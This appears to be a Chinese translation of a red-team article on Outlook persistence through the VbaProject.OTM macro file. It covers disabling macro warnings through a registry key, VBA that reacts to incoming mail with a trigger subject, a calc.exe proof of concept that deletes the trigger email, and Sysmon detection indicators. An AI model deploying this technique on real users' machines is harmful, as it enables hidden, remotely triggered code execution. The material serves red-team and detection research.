写在前面的话

使用低等级用户权限来实现持久化感染，是一种非常有价值的技术，因此我们打算在这篇文章中，跟大家介绍这种基于Outlook的持久化技术。值得一提的是，目前来说这种技术还没有被红队和蓝队所关注。

实际上，基于Outlook的持久化技术在此之前就已经被提到过很多次了，包括Dave Hartley和Nick Landers之前所作的工作，他们详细介绍了如何使用Outlook的规则来实现持久化。但是，在这篇文章中，我们将重点介绍如何使用Outlook的VbsProject.OTM文件来实现持久化。据我们所知，虽然了解这项技术的人不多，但Cobalt Kitty已将其用作命令和控制信道了。

技术分析

跟大多数的Microsoft Office产品一样，Outlook也可以启用开发者选项，并通过VB编辑器来创建基于VBA的宏。打开编辑器，然后创建一个简单的宏文件，你将会看到一个名为“ThisOutlookSession”的Outlook模块：

保存这个宏之后，一个VbaProject.OTM文件将会在“%APPDATA%RoamingMicrosoftOutlook ”目录中被创建：

在默认配置下是无法执行这个宏的，因为默认配置为“除了已签名的宏之外，其他所有的宏都被禁用”。

但是，我们可以通过使用以下值创建Security注册表项来修改此配置：

Level值定义的是宏安全配置，包含下列值：

4 = Disable all macros without notification

3 = Notifications for digitally signed macros, all other macros disabled

2 = Notifications for all macros

1 = Enable all Macros

如果想允许宏以隐蔽方式运行而不通知用户的话，我们需要设置“Level”值以在操作期间启用所有宏。

通过检查VbaProject.OTM文件，我们发现它是标准的Microsoft复合文档文件（CDF）：

dmc@deathstar ~  ✗ file ~/VbaProject.OTM

VbaProject.OTM: Composite Document File V2 Document, Cannot read section info

对oledump.py进行深入分析后，我们发现了包含宏代码的OLE数据流：

dmc@deathstar ~  ✗ python oledump.py ~/VbaProject.OTM

  1:        43 'OutlookProjectData'

  2:       388 'OutlookVbaData/PROJECT'

  3:        59 'OutlookVbaData/PROJECTwm'

  4: M    6156 'OutlookVbaData/VBA/ThisOutlookSession'

  5:      2663 'OutlookVbaData/VBA/_VBA_PROJECT'

  6:       497 'OutlookVbaData/VBA/dir'

现在，我们已经知道VbaProject.OTM是一个启用了标准OLE宏的文档，因此创建、混淆、清除和重载这些文件的传统工具和技术仍然适用。接下来，我们看看如何将其转换成一种持久化武器。

宏武器化

为了让这种VBA代码执行技术转换成对我们有用的东西，我们需要将代码作为事件的结果执行。ThisOutlookSession模块允许我们订阅Outlook中的各种事件，这就是我们实现代码执行的一个可用元素了。

针对持久化来说，目标事件的潜在选项包括用户驱动的某些事件，比如说Outlook打开或用户自行操作的某些事件，例如指定的邮件送达等等。对于我们的场景，我们将主要研究如何利用带有特定主题的邮件来执行任意的VBA。

为了确认新邮件的接收时间，我们可以在Outlook启动时首先订阅默认收件箱的相关事件。首先，在注册事件的同时在默认收件箱文件夹(olInboxItems)中设置变量：

Option Explicit

Private WithEvents olInboxItems As Items

Private Sub Application_Startup()

    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items

End Sub

为了使用指向用户收件箱的引用，我们可以使用“ItemAdd”回调来接收新消息抵达事件：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)

End Sub

具体说来，我们只对接收的电子邮件感兴趣，因此我们需要对回调进行优化，只允许新邮件来触发我们的事件。这里可以通过验证邮件类型是否为“MailItem”来实现：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)  

    If TypeOf Item Is MailItem Then

        MsgBox "You have mail"

    End If

End Sub

当然了，我们并不需要每一封接收到的邮件都触发我们的事件，所以我们需要对邮件地址、主题和正文内容等进行过滤：

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)

    On Error Resume Next

    Dim olMailItem As MailItem

    If TypeOf Item Is MailItem Then

       If InStr(olMailItem.Subject, "MDSec") > 0 Then

            MsgBox "Hack The Planet"

            olMailItem.Delete

        End If

    End If

    Set Item = Nothing

    Set olMailItem = Nothing

End Sub

持久化PoC

综上所属，让我们来弹个计算器（calc.exe）试试：

Option Explicit

 

Private WithEvents olInboxItems As Items

 

Private Sub Application_Startup()

    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items

End Sub

 

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)

    On Error Resume Next

    Dim olMailItem As MailItem

    If TypeOf Item Is MailItem Then

       If InStr(olMailItem.Subject, "MDSec") > 0 Then

            MsgBox "Hack The Planet"

            Shell "calc.exe"

            olMailItem.Delete

        End If

    End If

    Set Item = Nothing

    Set olMailItem = Nothing

End Sub

PoC演示

检测

从目标设备的角度来看，我们可以通过下列两个关键指标来检测这种攻击技术：

• 监控“%APPDATA%RoamingMicrosoftOutlookVbaProject.OTM”文件的创建和修改事件（Sysmon 事件 ID 11）；
• 监控“HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookSecurity”注册表键值的创建和修改事件(Sysmon 事件 ID 12)；